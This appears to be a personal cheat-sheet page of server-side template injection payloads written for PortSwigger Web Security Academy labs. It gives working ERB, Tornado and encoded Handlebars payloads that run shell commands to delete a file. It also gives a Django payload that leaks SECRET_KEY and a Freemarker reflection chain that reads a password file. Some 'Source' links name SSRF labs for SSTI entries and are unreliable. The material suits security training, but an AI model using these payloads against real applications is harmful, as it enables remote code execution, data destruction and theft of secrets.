[[$Polygloth Detection]]
[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md?ref=sec.stealthcopter.com)
##### Server-Side Template Injection (ERB) – delete file via `system()`
```http
GET /?message=<%25+system("rm+/home/carlos/morale.txt")+%25> HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```
Context: The `message` parameter is rendered unsanitized in an ERB template, allowing arbitrary Ruby code execution via `<%= ... %>` syntax. Here, `system("rm /home/carlos/morale.txt")` removes the target file.
Encoding: URL-encoded ERB delimiters (`<%` → `%25`, `%>` → `%25`)
Source: [[1. Basic SSRF against the local server]]
-----
##### SSTI in Tornado (code context) – delete file via `os.system()`
```http
POST /my-account/change-blog-post-author-display HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')
```
Context: The `blog-post-author-display` value is rendered inside Tornado’s template logic (`{% … %}`) and expression (`{{ … }}`) blocks without sanitization. By escaping the original expression (`user.name}}`), importing the `os` module in a logic block (`{% import os %}`) and then invoking `os.system()` in an expression block, arbitrary OS commands are executed.
Encoding: URL-encoded control delimiters (`%25` for `{%` and `%}`), spaces as `+`, path spaces as `%20`
Source: [[2. Basic SSRF against another back-end system]]
---
##### SSTI in unknown template engine (Handlebars) – delete file via documented exploit
```http
GET /?message=wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b%7b%2f%77%69%74%68%7d%7d HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```
Context: The `message` parameter is rendered with Handlebars. By leveraging the documented @Zombiehelp54 exploit, you instantiate functions via prototype manipulation and call `require('child_process').exec('rm /home/carlos/morale.txt')`, deleting the target file.
Encoding: URL encoding of Handlebars control characters and line breaks
Source: [[4. Server-side template injection in an unknown language with a documented exploit]]
---
##### Server-side template injection in Django – disclose `SECRET_KEY` via `settings`
```django
{{ settings.SECRET_KEY }}
```
Context: The product description template is rendered with a Django context that includes the `settings` object. After confirming the engine using `{% debug %}`, injecting `{{ settings.SECRET_KEY }}` outputs the framework’s secret key.
Encoding: None
Source: [[5. Server-side template injection with information disclosure via user-supplied objects]]
---
##### SSTI in Freemarker sandbox – read file via method chain
```freemarker
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
Context: The `product` object is exposed in a Freemarker template protected by a weak sandbox. By chaining Java reflection and I/O methods—getting the class’s protection domain, resolving the target file URI, opening its stream, reading all bytes, and joining them as a string—you can dump the contents of `my_password.txt` from Carlos’s home directory.
Encoding: None
Source: [[6. Server-side template injection in a sandboxed environment]]
---